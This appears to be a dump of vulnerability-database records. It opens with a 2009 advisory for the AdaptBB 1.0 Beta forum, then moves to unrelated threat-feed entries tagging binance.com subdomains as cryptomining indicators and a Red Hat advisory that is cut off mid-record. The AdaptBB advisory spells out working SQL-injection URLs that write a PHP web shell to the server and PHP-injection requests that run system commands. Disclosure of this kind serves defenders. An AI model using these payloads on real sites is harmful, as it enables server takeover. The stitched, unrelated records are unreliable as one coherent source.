{"id": "SECURITYVULNS:DOC:21607", "bulletinFamily": "software", "title": "AdaptBB 1.0 Beta Multiple Remote Vulnerabilities", "description": "******* Salvatore "drosophila" Fresta *******\r\n\r\n[+] Application: AdaptBB\r\n[+] Version: 1.0 Beta\r\n[+] Website: http://sourceforge.net/projects/adaptbb/\r\n\r\n[+] Bugs: [A] Multiple Blind SQL Injection\r\n [B] Multiple Dynamic Code Execution\r\n [C] Arbitrary File Upload\r\n\r\n[+] Exploitation: Remote\r\n[+] Date: 09 Apr 2009\r\n\r\n[+] Discovered by: Salvatore "drosophila" Fresta\r\n[+] Author: Salvatore "drosophila" Fresta\r\n[+] Contact: e-mail: drosophilaxxx@gmail.com\r\n\r\n\r\n*************************************************\r\n\r\n[+] Menu\r\n\r\n1) Bugs\r\n2) Code\r\n3) Fix\r\n\r\n\r\n*************************************************\r\n\r\n[+] Bugs\r\n\r\n\r\n- [A] Multiple Blind SQL Injection\r\n\r\n[-] Risk: medium\r\n[-] Requisites: magic_quotes_gpc = off\r\n[-] File affected: almost all of the files are\r\nvulnerable\r\n\r\nThis bug allows a guest to execute arbitrary SQL\r\nqueries.\r\n\r\n\r\n- [B] Multiple Dynamic Code Execution\r\n\r\n[-] Risk: hight\r\n[-] File affected: almost all of the files are\r\nvulnerable\r\n\r\nThis bug allows a guest to execute arbitrary php\r\ncode.\r\n\r\n...\r\n\r\nif ($_GET['box']) {\r\n$folder = $_GET['box'];\r\n}\r\n\r\n...\r\n\r\n$ddata[] = ucwords($folder);\r\n\r\n...\r\n\r\neval (" ?> ".str_replace($cdata, $ddata,\r\nstripslashes(template($view."_header")))." <?php ");\r\n\r\n...\r\n\r\n\r\n- [C] Arbitrary File Upload\r\n\r\n[-] Risk: hight\r\n[-] File affected: attach.php\r\n\r\nThis bug allows a registered user to upload\r\narbitrary files and to execute them from\r\ninc/attachments directory. This is possible\r\nbecause there are no controls on file extension\r\non the server side but only on the client side.\r\n\r\n\r\n*************************************************\r\n\r\n[+] Code\r\n\r\n\r\n- [A] Multiple Blind SQL Injection\r\n\r\nhttp://site/path/inc/attach.php?id=-1' UNION ALL SELECT '<?php\r\nsystem($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE\r\n'/var/www/htdocs/path/rce.php'%23\r\n\r\nhttp://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL\r\nSELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE\r\n'/var/www/htdocs/path/rce.php'%23\r\n\r\nhttp://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL\r\nSELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE\r\n'/var/www/htdocs/path/rce.php'%23\r\n\r\nhttp://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '<?php\r\nsystem($_GET[cmd])%3b ?>',2,3,4,5,6,7,8,9 INTO OUTFILE\r\n'/var/www/htdocs/path/rce.php'%23\r\n\r\nTo execute commands:\r\n\r\nhttp://site/path/rce.php?cmd=uname -a\r\n\r\n\r\n- [B] Multiple Dynamic Code Execution\r\n\r\nhttp://www.site.com/path/index.php?do=profile&user=blabla&box=<?php\r\necho "<pre>"; system('ls'); echo "</pre>"?>\r\n\r\nhttp://www.site.com/path/index.php?do=messages&user=blabla&box=<?php\r\necho "<pre>"; system('ls'); echo "</pre>"?>\r\n\r\n\r\n*************************************************\r\n\r\n[+] Fix\r\n\r\nTo fix them you must check the input properly.\r\nHowever is not recommended to store your real\r\nusername and password in the cookies.\r\n\r\n\r\n*************************************************\r\n\r\n-- \r\nSalvatore "drosophila" Fresta\r\nCWNP444351", "published": "2009-04-10T00:00:00", "modified": "2009-04-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21607", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:29", "edition": 1, "viewCount": 37, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:10:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2018-19276", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "exploitdb", "idList": ["EDB-ID:47792"]}, {"type": "zdt", "idList": ["1337DAY-ID-33682"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155691"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/OPENMRS_DESERIALIZATION"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142136"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32659", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:29", "rev": 2}, "vulnersScore": 7.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"rst": [{"id": "RST:83800430-31EA-3B11-B2E2-5390FCE4F490", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 21607.api.binance.com", "description": "Found **21607[.]api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **12**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-05-10T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 52[.]194.156.8,18.180.160.128\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-05T00:00:00", "modified": "2021-01-17T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-05-10T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "a3165d9ec70d8553a4706c5d38de6f99"}, {"key": "domain", "hash": "ee2982e4fd0720849736a3ef3a43b53c"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "5b12a441609a1b20d5d6893ac57cb711"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "e4064cd49ef6f66b02bf831e9efc8d14"}, {"key": "modified", "hash": "b28fecf7cdd87ea586e214d4cdc696b0"}, {"key": "published", "hash": "e5744f2408b88c35e0a72e50322ac032"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "1ba51fe53e4a450cda4519f570e1efd3"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "9eed3d124c9d7e7f7cdc155dd07d4fad"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "5f05f66094e0997074486fd7099b6f23e0634f92bb2f27753c07563d66ac0871", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "domain", "ip": ["52.194.156.8", "18.180.160.128"], "domain": ["21607.api.binance.com"], "url": [], "iocScore": {"ioc_frequency": 0.26, "ioc_src": 58.88, "ioc_tags": 0.8, "ioc_total": 12.0}, "tags": ["cryptomining"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {}, "asn": {}, "threat": [], "immutableFields": []}, {"id": "RST:56717C42-DE30-3739-B6B5-0FF042494C33", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 21607.binance.com", "description": "Found **21607[.]binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **47**.\n First seen: 2021-05-10T03:00:00, Last seen: 2021-05-10T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 52[.]194.156.8,18.180.160.128\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-05T00:00:00", "modified": "2021-05-10T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-05-10T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "91671140319d0ebb5327e9242c0db3a4"}, {"key": "domain", "hash": "b93c465ea93951a3d472110d4c70d7af"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "4711eb7653368dd358e14718f1c9c46a"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "e4064cd49ef6f66b02bf831e9efc8d14"}, {"key": "modified", "hash": "09c2e5c5ecdf1474d39ae03b27510f90"}, {"key": "published", "hash": "e5744f2408b88c35e0a72e50322ac032"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "1ba51fe53e4a450cda4519f570e1efd3"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "79b688fee0c25cb4c1b9456440d1f168"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "c5028522d3fef7a7375371b97777c796080078b7bba1a29903a2691ef0344c4a", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "domain", "ip": ["52.194.156.8", "18.180.160.128"], "domain": ["21607.binance.com"], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 58.88, "ioc_tags": 0.8, "ioc_total": 47.0}, "tags": ["cryptomining"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {}, "asn": {}, "threat": []}, {"id": "RST:1CCC4B0E-25FD-3076-B8F3-147E65875B49", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 21607.dev.api.binance.com", "description": "Found **21607[.]dev.api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **12**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-05-10T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 52[.]194.156.8,18.180.160.128\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-05T00:00:00", "modified": "2021-01-17T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-05-10T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "d9bfd20097d565b79a3cc0fc894a7168"}, {"key": "domain", "hash": "33a74ffa22bc4ed23663ac18810072a1"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "5b12a441609a1b20d5d6893ac57cb711"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "e4064cd49ef6f66b02bf831e9efc8d14"}, {"key": "modified", "hash": "b28fecf7cdd87ea586e214d4cdc696b0"}, {"key": "published", "hash": "e5744f2408b88c35e0a72e50322ac032"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "1ba51fe53e4a450cda4519f570e1efd3"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "5ea63d9f8835ec3c6ce52b68d36e83d2"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "05420ac1c46564c193e6eca941b45e6e166cae52f4ae895b16527f9dcee7dc01", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "domain", "ip": ["52.194.156.8", "18.180.160.128"], "domain": ["21607.dev.api.binance.com"], "url": [], "iocScore": {"ioc_frequency": 0.26, "ioc_src": 58.88, "ioc_tags": 0.8, "ioc_total": 12.0}, "tags": ["cryptomining"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {}, "asn": {}, "threat": [], "immutableFields": []}, {"id": "RST:B5CE3E45-3B50-3382-966A-73E053ADC79A", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 21607.eu.api.binance.com", "description": "Found **21607[.]eu.api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **12**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-05-10T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 18[.]180.160.128,52.194.156.8\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-05T00:00:00", "modified": "2021-01-17T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-05-10T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "34c178366eaee4653b3eed4edcd7d3f8"}, {"key": "domain", "hash": "33f8a757a1c23aa0b9caf4eb72163772"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "5b12a441609a1b20d5d6893ac57cb711"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "e4064cd49ef6f66b02bf831e9efc8d14"}, {"key": "modified", "hash": "b28fecf7cdd87ea586e214d4cdc696b0"}, {"key": "published", "hash": "e5744f2408b88c35e0a72e50322ac032"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "1ba51fe53e4a450cda4519f570e1efd3"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ce6ae3979aeaaec657d67e589a9ea2cf"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "842ba79c027bc7753785ec93a3fc6d1f11f0ed4654282cc07a0b3ddbf86e4cbb", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "domain", "ip": ["52.194.156.8", "18.180.160.128"], "domain": ["21607.eu.api.binance.com"], "url": [], "iocScore": {"ioc_frequency": 0.26, "ioc_src": 58.88, "ioc_tags": 0.8, "ioc_total": 12.0}, "tags": ["cryptomining"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {}, "asn": {}, "threat": [], "immutableFields": []}, {"id": "RST:DC63DA5B-BACA-3070-8C9D-79FD64482767", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 21607.us.api.binance.com", "description": "Found **21607[.]us.api.binance.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **12**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-05-10T03:00:00.\n IOC tags: **cryptomining**.\nDomain has DNS A records: 18[.]180.160.128,52.194.156.8\nWhois:\n Created: 2017-04-01 16:48:33, \n Registrar: unknown, \n Registrant: MarkMonitor Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-05T00:00:00", "modified": "2021-01-17T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-05-10T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "149b3cb8fd890d17ac0d3036bf52c967"}, {"key": "domain", "hash": "e01f9f81c6264861d44f15502d07b360"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "5b12a441609a1b20d5d6893ac57cb711"}, {"key": "iocType", "hash": "ad5f82e879a9c5d6b5b442eb37e50551"}, {"key": "ip", "hash": "e4064cd49ef6f66b02bf831e9efc8d14"}, {"key": "modified", "hash": "b28fecf7cdd87ea586e214d4cdc696b0"}, {"key": "published", "hash": "e5744f2408b88c35e0a72e50322ac032"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "1ba51fe53e4a450cda4519f570e1efd3"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "e1b91ed9de8c7ee6972564e5151a8980"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "a125ad93ff15e758a3bbe639ee9ba2c5e6380401b2646b746b121b3f5ee46aae", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "domain", "ip": ["52.194.156.8", "18.180.160.128"], "domain": ["21607.us.api.binance.com"], "url": [], "iocScore": {"ioc_frequency": 0.26, "ioc_src": 58.88, "ioc_tags": 0.8, "ioc_total": 12.0}, "tags": ["cryptomining"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {}, "asn": {}, "threat": [], "immutableFields": []}], "redhat": [{"id": "RHSA-2021:0719", "hash": "578282921bd87fa03cd89b99e3ec111d", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0719) Moderate: Red Hat Advanced Cluster Management 2.0.8 security and bug fix update", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images.\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which resolve some security issues and bugs. See the following Release Notes documentation, which will be updated shortly for this release, for details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.0/html/release_notes/\n\nSecurity fixes:\n\n* multicloud-operators-foundation: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)", "published": "2021-03-04T04:30:29", "modified": "2021-03-16T02:17:07", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, "href": "https://access.redhat.com/errata/RHSA-2021:0719", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2015-8011", "CVE-2019-16541", "CVE-2019-25013", "CVE-2020-10029", "CVE-2020-10543", "CVE-2020-10878", "CVE-2020-11979", "CVE-2020-12723", "CVE-2020-14040", "CVE-2020-14351", "CVE-2020-14370", "CVE-2020-15436", "CVE-2020-15586", "CVE-2020-16845", "CVE-2020-1945", "CVE-2020-2252", "CVE-2020-2254", "CVE-2020-2255", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-25211", "CVE-2020-25705", "CVE-2020-28362", "CVE-2020-29573", "CVE-2020-29661", "CVE-2020-35513", "CVE-2020-8563", "CVE-2020-8564", "CVE-2021-20230", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615", "CVE-2021-3121"], "immutableFields": [], "lastseen": "2021-08-25T20:37:40", "history": [{"bulletin": {"id": "RHSA-2021:0719", "hash": "7a33978a6da65732fb75ede95e0e23d4", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0719) Moderate: Red Hat Advanced Cluster Management 2.0.8 security and bug fix update", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images.\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which resolve some security issues and bugs. See the following Release Notes documentation, which will be updated shortly for this release, for details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.0/html/release_notes/\n\nSecurity fixes:\n\n* multicloud-operators-foundation: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)", "published": "2021-03-04T04:30:29", "modified": "2021-03-04T04:31:18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0719", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-12723", "CVE-2020-25705", "CVE-2020-35513", "CVE-2021-3121", "CVE-2020-10543", "CVE-2021-20230", "CVE-2020-14351", "CVE-2020-29661", "CVE-2020-15436", "CVE-2020-10878"], "immutableFields": [], "lastseen": "2021-03-03T23:40:42", "history": [], "viewCount": 57, "enchantments": {"dependencies": {"modified": "2021-03-03T23:40:42", "references": [{"idList": ["PERL_ADVISORY5.ASC"], "type": "aix"}, {"idList": ["FEDORA:017273129EBB", "FEDORA:481D1608F47B"], "type": "fedora"}, {"idList": ["CESA-2021:0343"], "type": "centos"}, {"idList": ["ALAS2-2021-1610"], "type": "amazon"}, {"idList": ["VZA-2021-006", "VZA-2021-008"], "type": "virtuozzo"}, {"idList": ["CFOUNDRY:DC88CEA06ECA856893E7D089D36ADB07"], "type": "cloudfoundry"}, {"idList": ["OPENVAS:1361412562310877942", "OPENVAS:1361412562310877986", "OPENVAS:1361412562310853226"], "type": "openvas"}, {"idList": ["H1:888986"], "type": "hackerone"}, {"idList": ["OPENSUSE-SU-2020:0850-1"], "type": "suse"}, {"idList": ["FEDORA_2020-4021BF2AE8.NASL", "EULEROS_SA-2020-1894.NASL", "SUSE_SU-2020-1682-2.NASL", "SUSE_SU-2020-1682-1.NASL", "UBUNTU_USN-4602-1.NASL", "REDHAT-RHSA-2021-0558.NASL", "ORACLELINUX_ELSA-2021-0558.NASL", "GENTOO_GLSA-202006-03.NASL", "REDHAT-RHSA-2021-0537.NASL", "CENTOS_RHSA-2021-0343.NASL"], "type": "nessus"}, {"idList": ["GLSA-202006-03"], "type": "gentoo"}, {"idList": ["RHSA-2021:0343", "RHSA-2021:0607", "RHSA-2021:0774", "RHSA-2021:0558", "RHSA-2021:0765", "RHSA-2021:0354", "RHSA-2021:0686", "RHSA-2021:0338", "RHSA-2021:0537", "RHSA-2021:0336"], "type": "redhat"}, {"idList": ["PACKETSTORM:160681"], "type": "packetstorm"}, {"idList": ["OPENWRT-SA-2020-12-09-1"], "type": "openwrt"}, {"idList": ["THN:2C912D2A2005BA770BBD4A4975BD3518"], "type": "thn"}, {"idList": ["USN-4659-2", "USN-4659-1", "USN-4602-2", "USN-4602-1"], "type": "ubuntu"}, {"idList": ["ELSA-2021-9005", "ELSA-2021-0336", "ELSA-2021-0343", "ELSA-2021-0618", "ELSA-2021-0558", "ELSA-2021-9006", "ELSA-2021-0557"], "type": "oraclelinux"}, {"idList": ["CVE-2020-12723", "CVE-2020-25705", "CVE-2020-35513", "CVE-2021-3121", "CVE-2020-10543", "CVE-2021-20230", "CVE-2020-14351", "CVE-2020-29661", "CVE-2020-15436", "CVE-2020-10878"], "type": "cve"}, {"idList": ["ZDI-20-1372"], "type": "zdi"}], "rev": 2}, "score": {"modified": "2021-03-03T23:40:42", "rev": 2, "value": 6.6, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [], "vendorCvss": {}}, "lastseen": "2021-03-03T23:40:42", "differentElements": ["cvelist", "modified"], "edition": 1}, {"bulletin": {"id": "RHSA-2021:0719", "hash": "e9a297fbc75a3430e3706c2218cabebc", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0719) Moderate: Red Hat Advanced Cluster Management 2.0.8 security and bug fix update", "description": "Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images.\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in.\n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which resolve some security issues and bugs. See the following Release Notes documentation, which will be updated shortly for this release, for details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.0/html/release_notes/\n\nSecurity fixes:\n\n* multicloud-operators-foundation: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 